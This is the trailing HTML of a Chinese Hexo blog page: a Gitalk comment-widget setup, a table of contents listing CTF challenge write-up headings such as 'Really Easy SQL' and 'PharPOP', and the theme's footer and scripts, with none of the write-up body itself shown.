        <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/gitalk/dist/gitalk.css">
        <script 
                src="//cdn.jsdelivr.net/npm/gitalk/dist/gitalk.min.js"
                async
                onerror="window.KeepCommentPlugin.loadFailHandle()"
        ></script>
        <script 
                async
                onerror="window.KeepCommentPlugin.loadFailHandle()"
        >
          window.KeepCommentPlugin.initGitalk = () => {
            let gitalkPathname = decodeURI(location.pathname)
            const gitalkPathnameLength = gitalkPathname.length
            const gitalkPathnameMaxLength = 50
            if (gitalkPathnameLength > gitalkPathnameMaxLength) {
              gitalkPathname = gitalkPathname.substring(0, gitalkPathnameMaxLength - 3) + '...'
            }

            if (window?.Gitalk) {
              new Gitalk({
                clientID: 'Ov23liQm7PTQpK5JLa0h',
                clientSecret: 'ba0525d7d59a301a09ac76ed9299df6ceb9a42a5',
                repo: 'gitalk-comments',
                owner: 'ohvy',
                admin: 'ohvy',
                id: gitalkPathname,
                proxy: '',
                language: 'zh-CN'
              }).render('gitalk-container')
              window.KeepCommentPlugin.hideLoading()
            } else {
              setTimeout(() => {
                window.KeepCommentPlugin.initGitalk()
              }, 1000)
            }
          }

          if ('false' === 'true') {
            setTimeout(() => {
              window.KeepCommentPlugin.initGitalk()
            }, 1200)
          } else {
            window.addEventListener('DOMContentLoaded', window.KeepCommentPlugin.initGitalk)
          }
        </script>
    </div>


        
    </div>





                
            </div>
        </div>

        
            <div class="pc-post-toc right-toc">
                <div class="post-toc-wrap border-box">
    <div class="post-toc border-box">
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#Really-Easy-SQL"><span class="nav-text">Really Easy SQL</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#easysql"><span class="nav-text">easysql</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#NodeSoEasy"><span class="nav-text">NodeSoEasy</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#PharPOP"><span class="nav-text">PharPOP</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%A7%A3%E9%A2%98%E6%80%9D%E8%B7%AF"><span class="nav-text">解题思路</span></a></li></ol></li></ol>
    </div>
</div>

            </div>
        
    </div>
</div>


                
            </div>
        </div>

        <div class="page-main-content-bottom border-box">
            
<footer class="footer border-box">
    <div class="border-box website-info-box default">
        
            <div class="copyright-info info-item default">
                &copy;&nbsp;<span>2022</span>&nbsp;-&nbsp;2024
                
                    &nbsp;<i class="fas fa-heart icon-animate"></i>&nbsp;&nbsp;<a href="/">Latte</a>
                
            </div>

            <div class="theme-info info-item default">
                由&nbsp;<a target="_blank" href="https://hexo.io">Hexo</a>&nbsp;驱动&nbsp;&&nbsp;主题&nbsp;<a class="keep-version" target="_blank" href="https://github.com/XPoet/hexo-theme-keep">Keep</a>
            </div>

            

            
        

        <div class="count-item info-item default">
            

            

            
        </div>
    </div>
</footer>

        </div>
    </div>

    <!-- post tools -->
    
        <div class="post-tools right-toc">
            <div class="post-tools-container border-box">
    <ul class="tools-list border-box">
        <!-- PC TOC show toggle -->
        
            <li class="tools-item flex-center toggle-show-toc">
                <i class="fas fa-list"></i>
            </li>
        

        <!-- PC go comment -->
        
            <li class="tools-item flex-center go-to-comments">
                <i class="fas fa-comment"></i>
                <span class="post-comments-count"></span>
            </li>
        

        <!-- PC full screen -->
        <li class="tools-item flex-center full-screen">
            <i class="fa-solid fa-expand"></i>
        </li>
    </ul>
</div>

        </div>
    

    <!-- side tools -->
    <div class="side-tools">
        <div class="side-tools-container border-box ">
    <ul class="side-tools-list side-tools-show-handle border-box">
        <li class="tools-item tool-font-adjust-plus flex-center">
            <i class="fas fa-search-plus"></i>
        </li>

        <li class="tools-item tool-font-adjust-minus flex-center">
            <i class="fas fa-search-minus"></i>
        </li>

        <li class="tools-item tool-toggle-theme-mode flex-center">
            <i class="fas fa-moon"></i>
        </li>

        <!-- rss -->
        

        <li class="tools-item tool-scroll-to-bottom flex-center">
            <i class="fas fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="exposed-tools-list border-box">
        
            <li class="tools-item toggle-show-toc-tablet flex-center">
                <i class="fas fa-list"></i>
            </li>
        

        
            <li class="tools-item go-to-comments-tablet flex-center">
                <i class="fas fa-comment"></i>
            </li>
        

        <li class="tools-item tool-toggle-show flex-center">
            <i class="fas fa-cog fa-spin"></i>
        </li>

        <li class="tools-item tool-scroll-to-top flex-center show-arrow">
            <i class="arrow fas fa-arrow-up"></i>
            <span class="percent"></span>
        </li>
    </ul>
</div>

    </div>

    <!-- image mask -->
    <div class="zoom-in-image-mask">
    <img class="zoom-in-image">
</div>


    <!-- local search -->
    
        <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
          <span class="search-input-field-pre">
            <i class="fas fa-keyboard"></i>
          </span>
            <div class="search-input-container">
                <input autocomplete="off"
                       autocorrect="off"
                       autocapitalize="off"
                       placeholder="搜索..."
                       spellcheck="false"
                       type="search"
                       class="search-input"
                >
            </div>
            <span class="close-popup-btn">
                <i class="fas fa-times"></i>
            </span>
        </div>
        <div id="search-result">
            <div id="no-result">
                <i class="fas fa-spinner fa-pulse fa-5x fa-fw"></i>
            </div>
        </div>
    </div>
</div>

    

    <!-- tablet toc -->
    
        <div class="tablet-post-toc-mask">
            <div class="tablet-post-toc">
                <div class="post-toc-wrap border-box">
    <div class="post-toc border-box">
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#Really-Easy-SQL"><span class="nav-text">Really Easy SQL</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#easysql"><span class="nav-text">easysql</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#NodeSoEasy"><span class="nav-text">NodeSoEasy</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#PharPOP"><span class="nav-text">PharPOP</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%A7%A3%E9%A2%98%E6%80%9D%E8%B7%AF"><span class="nav-text">解题思路</span></a></li></ol></li></ol>
    </div>
</div>

            </div>
        </div>
    
</main>



<!-- common -->
<script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.1/js/utils.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.1/js/header-shrink.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.1/js/back2top.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.1/js/toggle-theme.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.1/js/code-block.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.1/js/main.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.1/js/libs/anime.min.js"></script>

<!-- local-search -->

    <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.1/js/local-search.min.js"></script>


<!-- lazyload -->

    <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.1/js/lazyload.min.js"></script>


<div class="">
    
        <!-- post-helper -->
        <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.1/js/post/post-helper.min.js"></script>

        <!-- toc -->
        
            <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.1/js/post/toc.min.js"></script>
        

        <!-- copyright-info -->
        

        <!-- share -->
        
            <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.1/js/post/share.min.js"></script>
        
    

    <!-- categories page -->
    

    <!-- links page -->
    

    <!-- photos page -->
    

    <!-- tools page -->
    
</div>

<!-- mermaid -->


<!-- pjax -->



</body>
</html>
